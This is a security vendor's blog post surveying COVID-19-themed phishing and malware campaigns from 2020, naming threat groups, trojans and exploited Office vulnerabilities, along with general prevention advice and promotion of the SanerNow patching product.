Coronavirus, COVID-19 or SARSCoV2 has turned the lives of people across the globe into a nightmare. Attackers have utilized the pandemic as an opportunity to spread malware and ransomware by preying on the mindset of people in these times of crisis. Organizations opting for remote working setups has also carved out an additional opportunity for threat actors to continue infiltration.

A majority of attacks in recent times have been related to an ongoing campaign called COVID-19. This is the pandemic the digital world is dealing with. The recent wave of attacks under this campaign has included spam impersonating the Centers for Disease Control Prevention (CDC) and World Health Organization (WHO). While some ransomware operators have backed out from targeting health-related industries, several attacks have still been observed on the critical functioning COVID-19 testing centers in various parts of Europe.


Attacks under the umbrella of COVID-19 Campaign

  • Apt36(also known as Transparent Tribe, ProjectM, Mythic Leopard, TEMP.Lapis), a state sponsored threat actor has been distributing Crimson Remote Administration Tool (RAT) via malicious documents disguised as health advisories sent by Indian government officials. Attackers have stolen credentials from victim’s browsers, captured screenshots, collected information about running processes, directories and drives from the target systems.
  • Several other state sponsored APTs have ben related to this campaign.
    Chinese APTs: Mustang Panda and Vicious Panda
    North Korean APT: Kimsuky
    Russian APTs: Hades and TA542
  • TrickBot Trojan was distributed in Italy using malicious Word documents. Once installed on a target, the Trojan steals confidential information and spreads laterally in the network. TrickBot eventually launches PowerShell Empire or Cobalt Strike and provides access to Ryuk ransomware operators for further infection.
  • Many new malwares have been named CoronaVirus itself. CoronaVirus ransomware has been distributed along with the Kpot information-stealing Trojan through fake websites highlighting a legitimate Windows system utility named WiseCleaner. Another CoronaVirus malware locked out users on Windows Systems.
  • A malware downloader named GuLoader was distributed in a ZIP file attachment with emails. GuLoader in turn downloads an information-stealing Trojan named FormBook which possesses a functionality of keylogging and steals banking credentials, web site login credentials, cookies, etc.
  • Raccoon information stealer has been distributed using open redirects under the website of the U.S. Department of Health & Human Services. These redirect victims to phishing landing pages and download the malware on targets.
  • Netwalker Ransomware infections have become prevalent with the COVID-19 campaign delivered as malicious attachments with emails.
  • Redline information-stealing Trojan has been distributed through emails urging users to download Folding@home application but delivering the malware instead. This malware can steal saved login credentials, credit cards, cookies, and autocomplete fields from browsers.
  • A few cyber-attacks have hijacked and changed router’s DNS settings to display alerts for a fake COVID-19 information app from the World Health Organization and deliver the Oski information-stealing malware. These kinds of attacks could be used to steal money from bank accounts, perform identity theft, or launch further spear phishing attacks.
  • Zeus Sphinx banking Trojan has resurfaced after three years to steal banking credentials from users under the COVID-19 spear phishing campaign.
  • Another wave of attacks delivered the LokiBot Trojan using similar spear phishing lures.

A careful analysis of each of the attacks reveals that the main attack vector used in this campaign is spear phishing emails with COVID-19 themed lures.

A variety of documents including Microsoft Office files, zip files, Excel documents with embedded malicious macros, RTF documents, open redirects, PDFs, etc. are being distributed as attachments with spam emails with Coronavirus related information.


Vulnerabilities exploited

The distributed lure documents are known to exploit CVE-2017-11882 and CVE-2017-0199, which are critical remote code execution vulnerabilities in Microsoft Office.


SanerNow lists the potential targets for malwares in an enterprise network (shown in the figures below). SanerNow also lists the attack vectors used by each of these malwares or cyberespionage groups, and facilities automated patching for these vulnerabilities on affected systems. The additional details such as the specific behavior of every malware or cyberespionage group helps organizations in effectively preventing security incidents.

Fig1. SanerNow listing of potential targets in an organization for COVID-19 Campaign

Fig2. Details about COVID-19 Campaign


General recommendations to prevent attacks during the COVID-19 Crisis

  • Refrain from opening any emails and messages whose sender is not known.
  • Avoid clicking on links and opening documents sent on instant messaging platforms or emails. It is always advised to look for information from legitimate websites instead of following links found elsewhere.
  • Keep your systems up to date with the latest security patches.
  • Educate your teams and other members of the organization to use security products while working remotely. Here are a few guidelines that would prove to be useful.
  • Never provide sensitive information to agents trying to reach out on calls or emails. WHO and other governmental organizations never ask for sensitive data or direct donations for emergency response.
  • Set strong and unique passwords wherever applicable.

SanerNow detects the vulnerabilities which could be used as infection vectors for COVID-19 Campaign. Download SanerNow and keep your systems updated and secure.


 

Subscribe For Latest Updates

Get the latest research, best practices, industry trends and cybersecurity blogs from SecPod security experts

Invalid email address
We promise not to spam you. You can unsubscribe at any time.
Summary
COVID-19 of the digital world
Article Name
COVID-19 of the digital world
Author
Publisher Name
SecPod Technologies
Publisher Logo

Leave a Reply

Your email address will not be published. Required fields are marked *